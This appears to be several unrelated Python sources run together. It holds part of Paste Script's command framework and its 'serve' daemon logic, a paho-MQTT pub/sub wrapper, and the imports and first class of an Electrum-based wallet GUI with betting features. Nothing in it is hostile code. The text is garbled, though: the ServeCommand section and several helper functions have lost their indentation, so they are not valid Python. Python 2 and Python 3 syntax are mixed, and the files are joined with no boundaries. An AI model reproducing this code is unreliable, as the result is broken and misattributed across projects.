    # If this command takes a configuration file, set this to 1 or -1
    # Then if invoked through #! the config file will be put into the positional
    # arguments -- at the beginning with 1, at the end with -1
    takes_config_file = None
    # Grouped in help messages by this:
    group_name = ''
    # NOTE(review): required_args is assigned twice (None above, () here);
    # the empty tuple is the value that takes effect.
    required_args = ()
    description = None
    usage = ''
    hidden = False
    # This is the default verbosity level; --quiet subtracts,
    # --verbose adds:
    default_verbosity = 0
    # This is the default interactive state:
    default_interactive = 0
    return_code = 0
    BadCommand = BadCommand

    # Must define:
    #   parser
    #   summary
    #   command()
    def run(self, args):
        """Parse args, validate them, then dispatch to self.command().

        Returns self.return_code when command() returns None, otherwise
        command()'s return value. Raises BadCommand on validation errors.
        """
        self.parse_args(args)
        # Setup defaults:
        for name, default in [('verbose', 0),
                              ('quiet', 0),
                              ('interactive', False),
                              ('overwrite', False)]:
            if not hasattr(self.options, name):
                setattr(self.options, name, default)
        if getattr(self.options, 'simulate', False):
            # Simulation implies at least verbosity 1.
            self.options.verbose = max(self.options.verbose, 1)
        self.interactive = self.default_interactive
        if getattr(self.options, 'interactive', False):
            self.interactive += self.options.interactive
        if getattr(self.options, 'no_interactive', False):
            self.interactive = False
        self.verbose = self.default_verbosity
        self.verbose += self.options.verbose
        self.verbose -= self.options.quiet
        self.simulate = getattr(self.options, 'simulate', False)
        # For #! situations:
        if (os.environ.get('PASTE_CONFIG_FILE')
                and self.takes_config_file is not None):
            take = self.takes_config_file
            filename = os.environ.get('PASTE_CONFIG_FILE')
            if take == 1:
                self.args.insert(0, filename)
            elif take == -1:
                self.args.append(filename)
            else:
                assert 0, (
                    "Value takes_config_file must be None, 1, or -1 (not %r)"
                    % take)
        if (os.environ.get('PASTE_DEFAULT_QUIET')):
            self.verbose = 0
        # Validate:
        if self.min_args is not None and len(self.args) < self.min_args:
            raise BadCommand(
                self.min_args_error % {'min_args': self.min_args,
                                       'actual_args': len(self.args)})
        if self.max_args is not None and len(self.args) > self.max_args:
            raise BadCommand(
                self.max_args_error % {'max_args': self.max_args,
                                       'actual_args': len(self.args)})
        for var_name, option_name in self.required_args:
            if not getattr(self.options, var_name, None):
                raise BadCommand(
                    'You must provide the option %s' % option_name)
        result = self.command()
        if result is None:
            return self.return_code
        else:
            return result

    def parse_args(self, args):
        """Configure the parser's usage/prog/description, then parse args."""
        if self.usage:
            usage = ' '+self.usage
        else:
            usage = ''
        self.parser.usage = "%%prog [options]%s\n%s" % (
            usage, self.summary)
        self.parser.prog = self._prog_name()
        if self.description:
            desc = self.description
            desc = textwrap.dedent(desc)
            self.parser.description = desc
        self.options, self.args = self.parser.parse_args(args)

    def _prog_name(self):
        """Program name shown in help, e.g. 'paster serve'."""
        return '%s %s' % (os.path.basename(sys.argv[0]), self.command_name)

    ########################################
    ## Utility methods
    ########################################

    def pad(self, s, length, dir='left'):
        """Pad s with spaces to the given length ('left' pads on the right)."""
        if len(s) >= length:
            return s
        if dir == 'left':
            return s + ' '*(length-len(s))
        else:
            return ' '*(length-len(s)) + s

    def standard_parser(cls, verbose=True,
                        interactive=False,
                        no_interactive=False,
                        simulate=False,
                        quiet=False,
                        overwrite=False):
        """
        Create a standard ``OptionParser`` instance.
        Typically used like::
            class MyCommand(Command):
                parser = Command.standard_parser()
        Subclasses may redefine ``standard_parser``, so use the
        nearest superclass's class method.
        """
        parser = BoolOptionParser()
        if verbose:
            parser.add_option('-v', '--verbose',
                              action='count',
                              dest='verbose',
                              default=0)
        if quiet:
            parser.add_option('-q', '--quiet',
                              action='count',
                              dest='quiet',
                              default=0)
        if no_interactive:
            parser.add_option('--no-interactive',
                              action="count",
                              dest="no_interactive",
                              default=0)
        if interactive:
            parser.add_option('-i', '--interactive',
                              action='count',
                              dest='interactive',
                              default=0)
        if simulate:
            parser.add_option('-n', '--simulate',
                              action='store_true',
                              dest='simulate',
                              default=False)
        if overwrite:
            parser.add_option('-f', '--overwrite',
                              dest="overwrite",
                              action="store_true",
                              help="Overwrite files (warnings will be emitted for non-matching files otherwise)")
        return parser
    # Pre-decorator-syntax classmethod registration (Python 2.3 era style).
    standard_parser = classmethod(standard_parser)

    def quote_first_command_arg(self, arg):
        """
        There's a bug in Windows when running an executable that's
        located inside a path with a space in it. This method handles
        that case, or on non-Windows systems or an executable with no
        spaces, it just leaves well enough alone.
        """
        if (sys.platform != 'win32'
                or ' ' not in arg):
            # Problem does not apply:
            return arg
        try:
            import win32api
        except ImportError:
            raise ValueError(
                "The executable %r contains a space, and in order to "
                "handle this issue you must have the win32api module "
                "installed" % arg)
        # Short (8.3) paths never contain spaces.
        arg = win32api.GetShortPathName(arg)
        return arg

    def parse_vars(self, args):
        """
        Given variables like ``['a=b', 'c=d']`` turns it into ``{'a':
        'b', 'c': 'd'}``
        """
        result = {}
        for arg in args:
            if '=' not in arg:
                raise BadCommand(
                    'Variable assignment %r invalid (no "=")'
                    % arg)
            name, value = arg.split('=', 1)
            result[name] = value
        return result

    def logging_file_config(self, config_file):
        """
        Setup logging via the logging module's fileConfig function with the
        specified ``config_file``, if applicable.
        ConfigParser defaults are specified for the special ``__file__``
        and ``here`` variables, similar to PasteDeploy config loading.
        """
        parser = ConfigParser.ConfigParser()
        parser.read([config_file])
        if parser.has_section('loggers'):
            config_file = os.path.abspath(config_file)
            fileConfig(config_file, dict(__file__=config_file,
                                         here=os.path.dirname(config_file)))
class NotFoundCommand(Command):
    """Fallback command used when the requested command name is unknown.

    Prints the list of registered commands and always returns exit code 2.
    NOTE: Python 2 print statements -- this module predates Python 3.
    """

    def run(self, args):
        #for name, value in os.environ.items():
        #    print '%s: %s' % (name, value)
        #print sys.argv
        print ('Command %r not known (you may need to run setup.py egg_info)'
               % self.command_name)
        commands = get_commands().items()
        commands.sort()
        if not commands:
            print 'No commands registered.'
            print 'Have you installed Paste Script?'
            print '(try running python setup.py develop)'
            return 2
        print 'Known commands:'
        # Align summaries on the longest command name.
        longest = max([len(n) for n, c in commands])
        for name, command in commands:
            print ' %s %s' % (self.pad(name, length=longest),
                              command.load().summary)
        return 2
# ---- From paste.script.serve ----------------------------------------
# Fallback ceiling for file descriptors to close when daemonizing, used
# when RLIMIT_NOFILE reports an unlimited hard limit.
MAXFD = 1024
# True when running on Jython (Python on the JVM).
jython = sys.platform.startswith('java')
class DaemonizeException(Exception):
    """Raised when entering daemon mode fails (e.g. a live PID file exists)."""
    pass
class ServeCommand(Command):
min_args = 0
usage = 'CONFIG_FILE [start|stop|restart|status] [var=value]'
takes_config_file = 1
summary = "Serve the described application"
description = """\
This command serves a web application that uses a paste.deploy
configuration file for the server and application.
If start/stop/restart is given, then --daemon is implied, and it will
start (normal operation), stop (--stop-daemon), or do both.
You can also include variable assignments like 'http_port=8080'
and then use %(http_port)s in your config files.
"""
# used by subclasses that configure apps and servers differently
requires_config_file = True
parser = Command.standard_parser(quiet=True)
parser.add_option('-n', '--app-name',
dest='app_name',
metavar='NAME',
help="Load the named application (default main)")
parser.add_option('-s', '--server',
dest='server',
metavar='SERVER_TYPE',
help="Use the named server.")
parser.add_option('--server-name',
dest='server_name',
metavar='SECTION_NAME',
help="Use the named server as defined in the configuration file (default: main)")
if hasattr(os, 'fork'):
parser.add_option('--daemon',
dest="daemon",
action="store_true",
help="Run in daemon (background) mode")
parser.add_option('--pid-file',
dest='pid_file',
metavar='FILENAME',
help="Save PID to file (default to paster.pid if running in daemon mode)")
parser.add_option('--log-file',
dest='log_file',
metavar='LOG_FILE',
help="Save output to the given log file (redirects stdout)")
parser.add_option('--reload',
dest='reload',
action='store_true',
help="Use auto-restart file monitor")
parser.add_option('--reload-interval',
dest='reload_interval',
default=1,
help="Seconds between checking files (low number can cause significant CPU usage)")
parser.add_option('--monitor-restart',
dest='monitor_restart',
action='store_true',
help="Auto-restart server if it dies")
parser.add_option('--status',
action='store_true',
dest='show_status',
help="Show the status of the (presumably daemonized) server")
if hasattr(os, 'setuid'):
# I don't think these are available on Windows
parser.add_option('--user',
dest='set_user',
metavar="USERNAME",
help="Set the user (usually only possible when run as root)")
parser.add_option('--group',
dest='set_group',
metavar="GROUP",
help="Set the group (usually only possible when run as root)")
parser.add_option('--stop-daemon',
dest='stop_daemon',
action='store_true',
help='Stop a daemonized server (given a PID file, or default paster.pid file)')
if jython:
parser.add_option('--disable-jython-reloader',
action='store_true',
dest='disable_jython_reloader',
help="Disable the Jython reloader")
_scheme_re = re.compile(r'^[a-z][a-z]+:', re.I)
default_verbosity = 1
_reloader_environ_key = 'PYTHON_RELOADER_SHOULD_RUN'
_monitor_environ_key = 'PASTE_MONITOR_SHOULD_RUN'
possible_subcommands = ('start', 'stop', 'restart', 'status')
def command(self):
if self.options.stop_daemon:
return self.stop_daemon()
if not hasattr(self.options, 'set_user'):
# Windows case:
self.options.set_user = self.options.set_group = None
# @@: Is this the right stage to set the user at?
self.change_user_group(
self.options.set_user, self.options.set_group)
if self.requires_config_file:
if not self.args:
raise BadCommand('You must give a config file')
app_spec = self.args[0]
if (len(self.args) > 1
and self.args[1] in self.possible_subcommands):
cmd = self.args[1]
restvars = self.args[2:]
else:
cmd = None
restvars = self.args[1:]
else:
app_spec = ""
if (self.args
and self.args[0] in self.possible_subcommands):
cmd = self.args[0]
restvars = self.args[1:]
else:
cmd = None
restvars = self.args[:]
if (getattr(self.options, 'daemon', False)
and getattr(self.options, 'reload', False)):
raise BadCommand('The --daemon and --reload options may not be used together')
jython_monitor = False
if self.options.reload:
if jython and not self.options.disable_jython_reloader:
# JythonMonitor raises the special SystemRestart
# exception that'll cause the Jython interpreter to
# reload in the existing Java process (avoiding
# subprocess startup time)
try:
from paste.reloader import JythonMonitor
except ImportError:
pass
else:
jython_monitor = JythonMonitor(poll_interval=int(
self.options.reload_interval))
if self.requires_config_file:
jython_monitor.watch_file(self.args[0])
if not jython_monitor:
if os.environ.get(self._reloader_environ_key):
from paste import reloader
if self.verbose > 1:
print 'Running reloading file monitor'
reloader.install(int(self.options.reload_interval))
if self.requires_config_file:
reloader.watch_file(self.args[0])
else:
return self.restart_with_reloader()
if cmd not in (None, 'start', 'stop', 'restart', 'status'):
raise BadCommand(
'Error: must give start|stop|restart (not %s)' % cmd)
if cmd == 'status' or self.options.show_status:
return self.show_status()
if cmd == 'restart' or cmd == 'stop':
result = self.stop_daemon()
if result:
if cmd == 'restart':
print "Could not stop daemon; aborting"
else:
print "Could not stop daemon"
return result
if cmd == 'stop':
return result
self.options.daemon = True
if cmd == 'start':
self.options.daemon = True
app_name = self.options.app_name
vars = self.parse_vars(restvars)
if not self._scheme_re.search(app_spec):
app_spec = 'config:' + app_spec
server_name = self.options.server_name
if self.options.server:
server_spec = 'egg:PasteScript'
assert server_name is None
server_name = self.options.server
else:
server_spec = app_spec
base = os.getcwd()
if getattr(self.options, 'daemon', False):
if not self.options.pid_file:
self.options.pid_file = 'paster.pid'
if not self.options.log_file:
self.options.log_file = 'paster.log'
# Ensure the log file is writeable
if self.options.log_file:
try:
writeable_log_file = open(self.options.log_file, 'a')
except IOError, ioe:
msg = 'Error: Unable to write to log file: %s' % ioe
raise BadCommand(msg)
writeable_log_file.close()
# Ensure the pid file is writeable
if self.options.pid_file:
try:
writeable_pid_file = open(self.options.pid_file, 'a')
except IOError, ioe:
msg = 'Error: Unable to write to pid file: %s' % ioe
raise BadCommand(msg)
writeable_pid_file.close()
if getattr(self.options, 'daemon', False):
try:
self.daemonize()
except DaemonizeException, ex:
if self.verbose > 0:
print str(ex)
return
if (self.options.monitor_restart
and not os.environ.get(self._monitor_environ_key)):
return self.restart_with_monitor()
if self.options.pid_file:
self.record_pid(self.options.pid_file)
if self.options.log_file:
stdout_log = LazyWriter(self.options.log_file, 'a')
sys.stdout = stdout_log
sys.stderr = stdout_log
logging.basicConfig(stream=stdout_log)
log_fn = app_spec
if log_fn.startswith('config:'):
log_fn = app_spec[len('config:'):]
elif log_fn.startswith('egg:'):
log_fn = None
if log_fn:
log_fn = os.path.join(base, log_fn)
self.logging_file_config(log_fn)
server = loadserver(server_spec, name=server_name, relative_to=base, global_conf=vars)
app = loadapp( app_spec, name=app_name, relative_to=base, global_conf=vars)
if self.verbose > 0:
if hasattr(os, 'getpid'):
msg = 'Starting server in PID %i.' % os.getpid()
else:
msg = 'Starting server.'
print msg
def serve():
try:
server(app)
except (SystemExit, KeyboardInterrupt), e:
if self.verbose > 1:
raise
if str(e):
msg = ' '+str(e)
else:
msg = ''
print 'Exiting%s (-v to see traceback)' % msg
if jython_monitor:
# JythonMonitor has to be ran from the main thread
threading.Thread(target=serve).start()
print 'Starting Jython file monitor'
jython_monitor.periodic_reload()
else:
serve()
def daemonize(self):
pid = live_pidfile(self.options.pid_file)
if pid:
raise DaemonizeException(
"Daemon is already running (PID: %s from PID file %s)"
% (pid, self.options.pid_file))
if self.verbose > 0:
print 'Entering daemon mode'
pid = os.fork()
if pid:
# The forked process also has a handle on resources, so we
# *don't* want proper termination of the process, we just
# want to exit quick (which os._exit() does)
os._exit(0)
# Make this the session leader
os.setsid()
# Fork again for good measure!
pid = os.fork()
if pid:
os._exit(0)
# @@: Should we set the umask and cwd now?
import resource # Resource usage information.
maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
if (maxfd == resource.RLIM_INFINITY):
maxfd = MAXFD
# Iterate through and close all file descriptors.
for fd in range(0, maxfd):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
if (hasattr(os, "devnull")):
REDIRECT_TO = os.devnull
else:
REDIRECT_TO = "/dev/null"
os.open(REDIRECT_TO, os.O_RDWR) # standard input (0)
# Duplicate standard input to standard output and standard error.
os.dup2(0, 1) # standard output (1)
os.dup2(0, 2) # standard error (2)
def record_pid(self, pid_file):
pid = os.getpid()
if self.verbose > 1:
print 'Writing PID %s to %s' % (pid, pid_file)
f = open(pid_file, 'w')
f.write(str(pid))
f.close()
atexit.register(_remove_pid_file, pid, pid_file, self.verbose)
def stop_daemon(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print 'No PID file exists in %s' % pid_file
return 1
pid = read_pidfile(pid_file)
if not pid:
print "Not a valid PID file in %s" % pid_file
return 1
pid = live_pidfile(pid_file)
if not pid:
print "PID in %s is not valid (deleting)" % pid_file
try:
os.unlink(pid_file)
except (OSError, IOError), e:
print "Could not delete: %s" % e
return 2
return 1
for j in range(10):
if not live_pidfile(pid_file):
break
import signal
os.kill(pid, signal.SIGTERM)
time.sleep(1)
else:
print "failed to kill web process %s" % pid
return 3
if os.path.exists(pid_file):
os.unlink(pid_file)
return 0
def show_status(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print 'No PID file %s' % pid_file
return 1
pid = read_pidfile(pid_file)
if not pid:
print 'No PID in file %s' % pid_file
return 1
pid = live_pidfile(pid_file)
if not pid:
print 'PID %s in %s is not running' % (pid, pid_file)
return 1
print 'Server running in PID %s' % pid
return 0
    def restart_with_reloader(self):
        # Convenience wrapper: supervise a child that watches source files
        # and exits with code 3 to request a restart.
        self.restart_with_monitor(reloader=True)
    def restart_with_monitor(self, reloader=False):
        """Re-exec this script in a child process and supervise it.

        With reloader=True the child watches its source files and exits
        with code 3 to request a restart; any other exit code is
        returned to the caller.  Without it, the child is restarted on
        any exit (crash monitor).  Returns 1 on Ctrl-C.
        """
        if self.verbose > 0:
            if reloader:
                print 'Starting subprocess with file monitor'
            else:
                print 'Starting subprocess with monitor parent'
        while 1:
            args = [self.quote_first_command_arg(sys.executable)] + sys.argv
            new_environ = os.environ.copy()
            # The environment variable tells the re-executed child which
            # role it is playing (see the serve() startup logic).
            if reloader:
                new_environ[self._reloader_environ_key] = 'true'
            else:
                new_environ[self._monitor_environ_key] = 'true'
            proc = None
            try:
                try:
                    _turn_sigterm_into_systemexit()
                    proc = subprocess.Popen(args, env=new_environ)
                    exit_code = proc.wait()
                    proc = None
                except KeyboardInterrupt:
                    print '^C caught in monitor process'
                    if self.verbose > 1:
                        raise
                    return 1
            finally:
                # If a live child is still referenced here (e.g. SIGTERM
                # became SystemExit while waiting), terminate it too.
                if (proc is not None
                    and hasattr(os, 'kill')):
                    import signal
                    try:
                        os.kill(proc.pid, signal.SIGTERM)
                    except (OSError, IOError):
                        pass
            if reloader:
                # Reloader always exits with code 3; but if we are
                # a monitor, any exit code will restart
                if exit_code != 3:
                    return exit_code
            if self.verbose > 0:
                print '-'*20, 'Restarting', '-'*20
def change_user_group(self, user, group):
if not user and not group:
return
import pwd, grp
uid = gid = None
if group:
try:
gid = int(group)
group = grp.getgrgid(gid).gr_name
except ValueError:
import grp
try:
entry = grp.getgrnam(group)
except KeyError:
raise BadCommand(
"Bad group: %r; no such group exists" % group)
gid = entry.gr_gid
try:
uid = int(user)
user = pwd.getpwuid(uid).pw_name
except ValueError:
try:
entry = pwd.getpwnam(user)
except KeyError:
raise BadCommand(
"Bad username: %r; no such user exists" % user)
if not gid:
gid = entry.pw_gid
uid = entry.pw_uid
if self.verbose > 0:
print 'Changing user to %s:%s (%s:%s)' % (
user, group or '(unknown)', uid, gid)
if hasattr(os, 'initgroups'):
os.initgroups(user, gid)
else:
os.setgroups([e.gr_gid for e in grp.getgrall()
if user in e.gr_mem] + [gid])
if gid:
os.setgid(gid)
if uid:
os.setuid(uid)
class LazyWriter(object):
    """
    File-like object that opens a file lazily when it is first written
    to.
    """

    def __init__(self, filename, mode='w'):
        self.filename = filename
        self.fileobj = None          # opened on first write
        self.lock = threading.Lock() # guards lazy open from racing threads
        self.mode = mode

    def open(self):
        """Open the underlying file on first use (thread-safe)."""
        if self.fileobj is None:
            # Double-checked: the unlocked test above is the fast path;
            # re-test under the lock before actually opening.  Using
            # `with` (instead of manual acquire/try/finally/release) is
            # the idiomatic, exception-safe form.
            with self.lock:
                if self.fileobj is None:
                    self.fileobj = open(self.filename, self.mode)
        return self.fileobj

    def write(self, text):
        fileobj = self.open()
        fileobj.write(text)
        fileobj.flush()

    def writelines(self, text):
        fileobj = self.open()
        fileobj.writelines(text)
        fileobj.flush()

    def flush(self):
        self.open().flush()
def live_pidfile(pidfile):
    """(pidfile:str) -> int | None
    Returns an int found in the named file, if there is one,
    and if there is a running process with that process id.
    Return None if no such process exists.
    """
    pid = read_pidfile(pidfile)
    if not pid:
        return None
    try:
        # Signal 0 probes for existence without delivering anything.
        os.kill(int(pid), 0)
    except OSError as e:
        # EPERM means the process exists but belongs to another user.
        if e.errno == errno.EPERM:
            return pid
        return None
    return pid
def read_pidfile(filename):
    """Return the integer PID stored in *filename*, or None when the
    file is absent, unreadable, or does not contain an integer."""
    if not os.path.exists(filename):
        return None
    try:
        f = open(filename)
        try:
            content = f.read()
        finally:
            f.close()
        return int(content.strip())
    except (ValueError, IOError):
        return None
def _remove_pid_file(written_pid, filename, verbosity):
current_pid = os.getpid()
if written_pid != current_pid:
# A forked process must be exiting, not the process that
# wrote the PID file
return
if not os.path.exists(filename):
return
f = open(filename)
content = f.read().strip()
f.close()
try:
pid_in_file = int(content)
except ValueError:
pass
else:
if pid_in_file != current_pid:
print "PID file %s contains %s, not expected PID %s" % (
filename, pid_in_file, current_pid)
return
if verbosity > 0:
print "Removing PID file %s" % filename
try:
os.unlink(filename)
return
except OSError, e:
# Record, but don't give traceback
print "Cannot remove PID file: %s" % e
# well, at least lets not leave the invalid PID around...
try:
f = open(filename, 'w')
f.write('')
f.close()
except OSError, e:
print 'Stale PID left in file: %s (%e)' % (filename, e)
else:
print 'Stale PID removed'
def ensure_port_cleanup(bound_addresses, maxtries=30, sleeptime=2):
    """
    This makes sure any open ports are closed.
    Does this by connecting to them until they give connection
    refused. Servers should call like::
        import paste.script
        ensure_port_cleanup([80, 443])
    """
    # The real work happens at interpreter exit.
    atexit.register(
        _cleanup_ports, bound_addresses,
        maxtries=maxtries, sleeptime=sleeptime)
def _cleanup_ports(bound_addresses, maxtries=30, sleeptime=2):
    # Wait for the server to release each bound port: keep connecting
    # until the connection is refused (nothing listening any more).
    import socket
    import errno
    for bound_address in bound_addresses:
        for attempt in range(maxtries):
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                sock.connect(bound_address)
            except socket.error as e:
                # Anything other than "refused" is unexpected — re-raise.
                if e.args[0] != errno.ECONNREFUSED:
                    raise
                break
            else:
                # Still accepting connections; give it a moment.
                time.sleep(sleeptime)
        else:
            raise SystemExit('Timeout waiting for port.')
        sock.close()
def _turn_sigterm_into_systemexit():
"""
Attempts to turn a SIGTERM exception into a SystemExit exception.
"""
try:
import signal
except ImportError:
return
def handle_term(signo, frame):
raise SystemExit
signal.signal(signal.SIGTERM, handle_term)
# ---- from paste.script.command --------------------------------------
# Module-level option parser shared by run()/invoke() below.
python_version = sys.version.splitlines()[0].strip()
parser = optparse.OptionParser(add_help_option=False,
                               # version='%s from %s (python %s)'
                               # % (dist, dist.location, python_version),
                               usage='%prog [paster_options] COMMAND [command_options]')
parser.add_option(
    '-h', '--help',
    action='store_true',
    dest='do_help',
    help="Show this help message")
# Stop parsing at the first positional argument so command-specific
# options are passed through to the sub-command untouched.
parser.disable_interspersed_args()
# @@: Add an option to run this in another Python interpreter
# Registry of available sub-commands.
commands = {
    'serve': ServeCommand
    }
def run(args=None):
    """Parse the global paster options and dispatch to a sub-command."""
    if (not args and
        len(sys.argv) >= 2
        and os.environ.get('_') and sys.argv[0] != os.environ['_']
        and os.environ['_'] == sys.argv[1]):
        # probably it's an exe execution
        args = ['exe', os.environ['_']] + sys.argv[2:]
    if args is None:
        args = sys.argv[1:]
    options, args = parser.parse_args(args)
    options.base_parser = parser
    if options.do_help:
        args = ['help'] + args
    if not args:
        print('Usage: %s COMMAND' % sys.argv[0])
        args = ['help']
    command_name = args[0]
    # Unknown command names fall back to the "not found" handler.
    command = commands.get(command_name, NotFoundCommand)
    invoke(command, command_name, options, args[1:])
def invoke(command, command_name, options, args):
    """Instantiate *command* and exit with the code its run() returns."""
    try:
        runner = command(command_name)
        exit_code = runner.run(args)
    except BadCommand as e:
        print(e.message)
        exit_code = e.exit_code
    sys.exit(exit_code)
#Manages connection to MQTT server.
#Handles subscriptions/publishing to server.
import paho.mqtt.client as mqtt
import json
import threading
def sameFunction(f1, f2):
    """True when f1 and f2 are the same underlying function.

    Bound methods are unwrapped to their __func__ so two bindings of the
    same method compare equal.  Used for unsubscribing: remove all
    subscriptions with a certain handler.  Hacky, fix later.
    """
    u1 = getattr(f1, '__func__', f1)
    u2 = getattr(f2, '__func__', f2)
    return u1 is u2
class MQTTServiceProvider:
    """Connects to an MQTT broker and dispatches JSON messages to
    per-topic lists of handler callables."""

    def __init__(self, clientName, serverAddress):
        self.client = mqtt.Client(clientName)
        self.client.on_connect = self.on_connect
        self.client.on_message = self.on_message
        self.client.on_publish = self.on_publish
        self.client.connect(serverAddress)
        # topic -> list of handler callables
        self.subscriptions = {}
        self.run()

    def on_connect(self, client, userdata, flags, rc):
        print("MQTTServiceProvider: Connected to MQTT server. Ready to subscribe and publish!")

    def on_message(self, client, userdata, msg):
        # Decode JSON payload and re-insert the topic for the handlers.
        payload_str = msg.payload.decode('utf-8')
        payload = json.loads(payload_str)
        payload["topic"] = msg.topic
        print("MQTT IN: TOPIC: %s and MESSAGE w/topic re-inserted: %s" % (msg.topic, payload))
        # BUG FIX: a message on a topic with no registered handlers used
        # to raise KeyError; iterate a copy so handlers may unsubscribe
        # while being dispatched.
        for handler in list(self.subscriptions.get(msg.topic, [])):
            handler(payload)

    def on_publish(self, client, userdata, res):
        pass

    #Need to connect this to topic:handler
    def subscribe(self, topic, handler):
        """Subscribe to *topic*, registering *handler* at most once."""
        self.client.subscribe(topic)
        handlers = self.subscriptions.setdefault(topic, [])
        if handler not in handlers:
            handlers.append(handler)

    def unsubscribe(self, handler):
        """Remove every subscription whose handler matches *handler*."""
        for topic in self.subscriptions:
            keep = []
            for h in self.subscriptions[topic]:
                # BUG FIX: plain functions have no __self__; getattr with
                # a default avoids the AttributeError the original raised.
                if (sameFunction(h, handler)
                        and getattr(h, '__self__', None) == getattr(handler, '__self__', None)):
                    print("MQTT: Removing subscription to", topic)
                else:
                    keep.append(h)
            self.subscriptions[topic] = keep

    def publish(self, topic, msg):
        """JSON-encode *msg* and publish it on *topic* (best effort)."""
        msg_str = json.dumps(msg).encode('utf-8')
        try:
            self.client.publish(topic, msg_str)
        except Exception as e:
            print("ERROR:", e)
        print("MQTT OUT: TOPIC: %s and MESSAGE: %s" % (topic, msg_str))

    def run(self):
        """Run the paho network loop on a background thread."""
        t = threading.Thread(target=self.client.loop_forever)
        t.start()
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from electrum import constants
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
import time
from datetime import datetime
from pytz import timezone
from tzlocal import get_localzone
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor,QDoubleValidator
from PyQt5.QtCore import QItemSelectionModel, QModelIndex, QRect, QSize, QSize, QStringListModel, QTimer, Qt, pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,QLayout,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,QFrame,
QShortcut, QMainWindow, QCompleter, QInputDialog,QDesktopWidget,
QWidget, QMenu, QSizePolicy, QStatusBar, QListView,QAbstractItemView,QSpacerItem, QSizePolicy,QListWidget,QListWidgetItem)
from PyQt5.QtGui import QStandardItemModel, QStandardItem,QFont
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.paymentrequest import PR_PAID
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, read_QImage, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .betting_history_list import (BettingHistoryList, BettingHistoryModel)
from .quick_games.dice.dice_history_list import (DiceHistoryList, DiceHistoryModel)
from .update_checker import UpdateCheck, UpdateCheckThread
from electrum.bet import PeerlessBet
from electrum.chaingame import ChainGame
from PyQt5 import QtWidgets
from .toogle_switch import ToogleSwitch
from .sport_list import SportListView
from .quick_games.quickgame_list import QuickGameListView
from .quick_games.dice.dicegame_main_widget import DiceGameWidget
from .betting_main_widget import BettingMainWidget
import re
from electrum.event import Event
class StatusBarButton(QPushButton):
    """Flat 25px icon button for the status bar.

    Activates *func* on click or on the Return key, swallowing the
    unwanted PyQt5 "checked" click argument.
    """

    def __init__(self, icon, tooltip, func):
        QPushButton.__init__(self, icon, '')
        self.func = func
        self.setToolTip(tooltip)
        self.setFlat(True)
        self.setMaximumWidth(25)
        self.setIconSize(QSize(25, 25))
        self.setCursor(QCursor(Qt.PointingHandCursor))
        self.clicked.connect(self.onPress)

    def onPress(self, checked=False):
        '''Drops the unwanted PyQt5 "checked" argument'''
        self.func()

    def keyPressEvent(self, e):
        if e.key() == Qt.Key_Return:
            self.func()
